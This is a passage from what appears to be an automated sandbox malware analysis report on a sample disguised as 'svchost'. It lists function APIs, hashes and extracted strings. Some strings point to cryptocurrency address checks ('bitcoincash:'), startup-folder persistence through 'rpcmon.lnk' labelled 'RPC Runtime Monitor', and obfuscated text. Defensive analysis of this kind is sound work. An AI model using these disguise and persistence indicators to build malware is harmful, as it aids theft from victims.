                                        • Part of subcall function 004103D6: DecodePointer.KERNEL32(00000005,004107FF,?,0040F780), ref: 004103E7
                                        • Part of subcall function 004103D6: TlsFree.KERNEL32(0000000C,004107FF,?,0040F780), ref: 00410401
                                        • Part of subcall function 004103D6: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,004107FF,?,0040F780), ref: 004125E8
                                        • Part of subcall function 004103D6: _free.LIBCMT ref: 004125EB
                                        • Part of subcall function 004103D6: DeleteCriticalSection.KERNEL32(0000000C,76EF5810,?,004107FF,?,0040F780), ref: 00412612
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004106B3
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004106C0
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004106CD
                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004106DA
                                      • TlsAlloc.KERNEL32(?,0040F780), ref: 0041072A
                                      • TlsSetValue.KERNEL32(00000000,?,0040F780), ref: 00410745
                                      • __init_pointers.LIBCMT ref: 0041074F
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 00410760
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 0041076D
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 0041077A
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 00410787
                                      • DecodePointer.KERNEL32(0041055A,?,0040F780), ref: 004107A8
                                      • __calloc_crt.LIBCMT ref: 004107BD
                                      • DecodePointer.KERNEL32(00000000,?,0040F780), ref: 004107D7
                                      • GetCurrentThreadId.KERNEL32 ref: 004107E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                      • API String ID: 3698121176-3819984048
                                      • Opcode ID: bd38d10914e9f58c4cef53f4dde5dc1812db3411cc6896fc4dcebcca636284c2
                                      • Instruction ID: 40795ae181cca19bb6142b5e762f73122f3cfe54ebf09a24129c268063ec4741
                                      • Opcode Fuzzy Hash: bd38d10914e9f58c4cef53f4dde5dc1812db3411cc6896fc4dcebcca636284c2
                                      • Instruction Fuzzy Hash: 0B319A30A01210ABC731AFB5AC156967EE0EB44725B504537E928C32F1D7B8A5D2CF5D
                                      Function 00406940 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: *07=JWdp$7$=$J$W$bitcoincash:$d$p$|
                                      • API String ID: 909875538-3576240675
                                      • Opcode ID: 8f2e373312d36219b60b9a5a7e1854ab49ea109c15ca698b580d7241a04ca57f
                                      • Instruction ID: ecf531c9375a07a423a8c1e4a6a4c70633f4976ddfcbcebe6c6e4547d44ee2d2
                                      • Opcode Fuzzy Hash: 8f2e373312d36219b60b9a5a7e1854ab49ea109c15ca698b580d7241a04ca57f
                                      • Instruction Fuzzy Hash: 29A17170A082A8DADF25CB25C8507EEBBB1AF42304F1480DAD48E7B382C6795F94DF55
                                      Function 004058A0 Relevance: 15.2, APIs: 10, Instructions: 152windowsynchronizationsleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040E170: _rand.LIBCMT ref: 0040E175
                                        • Part of subcall function 0040E170: _rand.LIBCMT ref: 0040E17F
                                      • DestroyWindow.USER32(00000000), ref: 00405969
                                      • GetLastError.KERNEL32 ref: 0040599F
                                      • DestroyWindow.USER32(00000000), ref: 004059AD
                                      • WaitForSingleObject.KERNEL32(00000000,00000000,C3108867), ref: 004059D2
                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00405A0F
                                      • TranslateMessage.USER32(?), ref: 00405A1D
                                      • DispatchMessageA.USER32(?), ref: 00405A27
                                      • Sleep.KERNEL32(00000014), ref: 00405A31
                                      • DestroyWindow.USER32(00000000), ref: 00405A71
                                      • ReleaseMutex.KERNEL32(00000000), ref: 00405A8E
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DestroyMessageWindow$_rand$DispatchErrorLastMutexObjectPeekReleaseSingleSleepTranslateWait
                                      • String ID:
                                      • API String ID: 4179124018-0
                                      • Opcode ID: 95db36bbe4d0b48d7d5dd216a49a5c101fdf29f495020ae77c52d24253815567
                                      • Instruction ID: 4f33caf6bca9ddad8697e74e62c9060a71084bf4d8c7d1bdb57def999465fb8c
                                      • Opcode Fuzzy Hash: 95db36bbe4d0b48d7d5dd216a49a5c101fdf29f495020ae77c52d24253815567
                                      • Instruction Fuzzy Hash: 92515BB0A00604DBDB20DFA4DC88BAFBBB4FB54714F14463AE506A62E0D7799905CF29
                                      Function 004018D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 196windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxA.USER32(00000000,?,00000000,?), ref: 00401B8F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: Configuration loaded from $INVALID ADDRESSES:$No config info found$VALID ADDRESSES:$k;B9=8prHYVXTHk87/20Hn25.Hz.98;=
                                      • API String ID: 2030045667-921656899
                                      • Opcode ID: a4f6f7a70e75182b8535afc958e6263b5f271b17888e7c424a2e56989852f6f4
                                      • Instruction ID: f26b0750d2dd7497bc4d0c1e5d1dca22003d29cf30daf5b63e4976072f097509
                                      • Opcode Fuzzy Hash: a4f6f7a70e75182b8535afc958e6263b5f271b17888e7c424a2e56989852f6f4
                                      • Instruction Fuzzy Hash: C1912970E442889FDB14CFA8C891BEDBBB1BF45308F14819AD1597B386C7746886CF59
                                      Function 00410413 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041E020,00000008,0041051B,00000000,00000000,?,?,00410B26,00410CE1,?,?,0040E795,?,?,00401568), ref: 00410424
                                      • __lock.LIBCMT ref: 00410458
                                        • Part of subcall function 004126FB: __mtinitlocknum.LIBCMT ref: 00412711
                                        • Part of subcall function 004126FB: __amsg_exit.LIBCMT ref: 0041271D
                                        • Part of subcall function 004126FB: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041045D,0000000D), ref: 00412725
                                      • InterlockedIncrement.KERNEL32(?), ref: 00410465
                                      • __lock.LIBCMT ref: 00410479
                                      • ___addlocaleref.LIBCMT ref: 00410497
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL
                                      • API String ID: 637971194-2576044830
                                      • Opcode ID: 24babe39312a7ec5cad1da249c5793e667f9701190cf8a0577b2977ea299dcce
                                      • Instruction ID: 7fb989b1ea40e66e3d5707d5b0016f419c3c6570b292f4f1006bf44dac2eb610
                                      • Opcode Fuzzy Hash: 24babe39312a7ec5cad1da249c5793e667f9701190cf8a0577b2977ea299dcce
                                      • Instruction Fuzzy Hash: CB018E71440B00ABD720DF66D905789FBE0BF08328F10890FE599922A1CBF8A9C4CB19
                                      Function 00415C24 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 00415C45
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00415C56
                                      • __getptd.LIBCMT ref: 00415C64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: MOC$RCC$csm
                                      • API String ID: 803148776-2671469338
                                      • Opcode ID: 120801709588897a0c6d79d438c9f3a1d2f3b9f75944f8f9ce78d84820664cc3
                                      • Instruction ID: 68d6bacec3ee04245c6d6a34250a27a57659d45bc5a15925c67b47308b05fb02
                                      • Opcode Fuzzy Hash: 120801709588897a0c6d79d438c9f3a1d2f3b9f75944f8f9ce78d84820664cc3
                                      • Instruction Fuzzy Hash: 9FE0ED305106049ED710EB65D08ABE93695BB84318F6914A7E41DCB322E77C99D0498A
                                      Function 0040E210 Relevance: 9.1, APIs: 6, Instructions: 97registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040E264
                                      • GetClassInfoA.USER32(00000000,00000000,?), ref: 0040E28B
                                      • RegisterClassA.USER32(00000000), ref: 0040E29F
                                      • CreateWindowExA.USER32(00000000,00000000,0041CCD4,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0040E2F8
                                      • ShowWindow.USER32(00000000,00000000), ref: 0040E30D
                                      • UnregisterClassA.USER32(00000000,00000000), ref: 0040E325
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Class$Window$CreateHandleInfoModuleRegisterShowUnregister
                                      • String ID:
                                      • API String ID: 801957319-0
                                      • Opcode ID: caccaf7d217365975b2b1e3a55c07ed66ec34c7c539f4e702f45ef9cbd056241
                                      • Instruction ID: a965deb00f86eced1c550541a2bb8782c69ddf198977c8bb291b1a06dc78ae28
                                      • Opcode Fuzzy Hash: caccaf7d217365975b2b1e3a55c07ed66ec34c7c539f4e702f45ef9cbd056241
                                      • Instruction Fuzzy Hash: 3B411B74D04209EFDB50CFA9D844BEEBBB5BB48300F14846EE919B7280D7789961CF69
                                      Function 00415ED1 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __CreateFrameInfo.LIBCMT ref: 00415EF9
                                        • Part of subcall function 00414757: __getptd.LIBCMT ref: 00414765
                                        • Part of subcall function 00414757: __getptd.LIBCMT ref: 00414773
                                      • __getptd.LIBCMT ref: 00415F03
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00415F11
                                      • __getptd.LIBCMT ref: 00415F1F
                                      • __getptd.LIBCMT ref: 00415F2A
                                      • _CallCatchBlock2.LIBCMT ref: 00415F50
                                        • Part of subcall function 004147FC: __CallSettingFrame@12.LIBCMT ref: 00414848
                                        • Part of subcall function 00415FF7: __getptd.LIBCMT ref: 00416006
                                        • Part of subcall function 00415FF7: __getptd.LIBCMT ref: 00416014
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                      • String ID:
                                      • API String ID: 1602911419-0
                                      • Opcode ID: 75cd6b2be72964fee2231a7901abf6b3f657a4c76e677a8a22719dcb4cf62958
                                      • Instruction ID: 8ee7e9482143d68d58532e94b41f02c712f5e5267d1978e0f484a2f57dee007e
                                      • Opcode Fuzzy Hash: 75cd6b2be72964fee2231a7901abf6b3f657a4c76e677a8a22719dcb4cf62958
                                      • Instruction Fuzzy Hash: A311EC71D00209EFDB00EFA5D545ADEB7B1FF08318F10806AF814E7251EB7899959F54
                                      Function 0040FB96 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __getptd.LIBCMT ref: 0040FBA2
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __amsg_exit.LIBCMT ref: 0040FBC2
                                      • __lock.LIBCMT ref: 0040FBD2
                                      • InterlockedDecrement.KERNEL32(?), ref: 0040FBEF
                                      • _free.LIBCMT ref: 0040FC02
                                      • InterlockedIncrement.KERNEL32(02402188), ref: 0040FC1A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: 8102f338a71b026d3340659caaf6562a795bcb1d7daf823b2c693a48d857979c
                                      • Instruction ID: 04197ae65fda5c63c56dbd3dc8e75b233e0ac2e231bfe1491633d9689cd981ba
                                      • Opcode Fuzzy Hash: 8102f338a71b026d3340659caaf6562a795bcb1d7daf823b2c693a48d857979c
                                      • Instruction Fuzzy Hash: DF01CB31941626ABD720AB6994067CA77A0BB04714F14403BE804B36D0D77CB98A8FCE
                                      Function 0040D6D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0040D722
                                      • SHGetFolderPathW.SHELL32(00000000,00000018,00000000,00000000,?), ref: 0040D780
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: FolderPath_memset
                                      • String ID: --run$RPC Runtime Monitor$\rpcmon.lnk
                                      • API String ID: 3318179493-935953821
                                      • Opcode ID: ea8451d6de9b8cfc2627a8931f54f8f4b5e0d66c4685855b03dc7c76c13e24c5
                                      • Instruction ID: 1050105f52961729ecfe266b6ed7309ec72b43aeb9dcbb43f9ef2f744927e597
                                      • Opcode Fuzzy Hash: ea8451d6de9b8cfc2627a8931f54f8f4b5e0d66c4685855b03dc7c76c13e24c5
                                      • Instruction Fuzzy Hash: 5B21EA74D4031CABDB20DFA0DC4ABE973B4AB14304F5045EEE819A72C1E7789A89DF59
                                      Function 0041627E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___BuildCatchObject.LIBCMT ref: 00416291
                                        • Part of subcall function 004161EC: ___BuildCatchObjectHelper.LIBCMT ref: 00416222
                                      • _UnwindNestedFrames.LIBCMT ref: 004162A8
                                      • ___FrameUnwindToState.LIBCMT ref: 004162B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                      • String ID: csm$csm
                                      • API String ID: 2163707966-3733052814
                                      • Opcode ID: f066d28ad6022a030d5a4565ed70b1ed185439130c489b07855e4e37ef1b6396
                                      • Instruction ID: 4da0fed9b642d527bb6294f99e7a8c099849be82aa3d1ad59cbd6958426e80c5
                                      • Opcode Fuzzy Hash: f066d28ad6022a030d5a4565ed70b1ed185439130c489b07855e4e37ef1b6396
                                      • Instruction Fuzzy Hash: EB014631400609BBDF126F52CC46EEB3F6AEF48354F01801ABC1814121D77AD9B1DBA8
                                      Function 00401180 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040119B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004011BC
                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 004011D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressCurrentHandleModuleProcProcess
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 4190356694-3301033669
                                      • Opcode ID: 1075c5336364abca5659f37d9a9cc68f408a79e6500bfff9146bd29ceb1b4dad
                                      • Instruction ID: f3a3b2490c05c86b39bee9860363372222596c46706d0865df52a15b71608fee
                                      • Opcode Fuzzy Hash: 1075c5336364abca5659f37d9a9cc68f408a79e6500bfff9146bd29ceb1b4dad
                                      • Instruction Fuzzy Hash: E00186B0D40208BBDF149FE0DC4DBDD7BB89B08349F104076E601B62E1D6785754DB5A
                                      Function 00401200 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040121B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040123C
                                      • GetCurrentProcess.KERNEL32(0000001F,00000000,00000004,00000000), ref: 00401255
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressCurrentHandleModuleProcProcess
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 4190356694-3301033669
                                      • Opcode ID: 938599bffe4c1af892667c408258da0dbef6e56edbcb903562bc19fef294f7be
                                      • Instruction ID: 283a584ac4493401d37b65e144df0ac759d1c493dcd86ba3b9ae389d4cc3117d
                                      • Opcode Fuzzy Hash: 938599bffe4c1af892667c408258da0dbef6e56edbcb903562bc19fef294f7be
                                      • Instruction Fuzzy Hash: 440181B0E4420CBBDF10AFF09C0DBDE7B789B04709F1040BAE501B22E1D6785644DB6A
                                      Function 0040E340 Relevance: 7.6, APIs: 5, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _wcschr$CreateDirectoryErrorLast_memset
                                      • String ID:
                                      • API String ID: 772003639-0
                                      • Opcode ID: 1bd9b1a094997a80373a257bff1b81ce494ae0b4b520e45ac5d92f2d47efe142
                                      • Instruction ID: 2d672686d953e9741263a9bf21e8db2c6a89ede790307b3869fa385045096eae
                                      • Opcode Fuzzy Hash: 1bd9b1a094997a80373a257bff1b81ce494ae0b4b520e45ac5d92f2d47efe142
                                      • Instruction Fuzzy Hash: B24173B0900218DBDB24CF65CC85BE97B74AB44300F0089FAE709772C1D6799A9A8F6D
                                      Function 00413BC9 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 00413BD7
                                        • Part of subcall function 00410B93: __FF_MSGBANNER.LIBCMT ref: 00410BAC
                                        • Part of subcall function 00410B93: __NMSG_WRITE.LIBCMT ref: 00410BB3
                                        • Part of subcall function 00410B93: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000,?,00412686,00000018,0041E0D0,0000000C,00412716), ref: 00410BD8
                                      • _free.LIBCMT ref: 00413BEA
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                      Joe Sandbox IDA Plugin
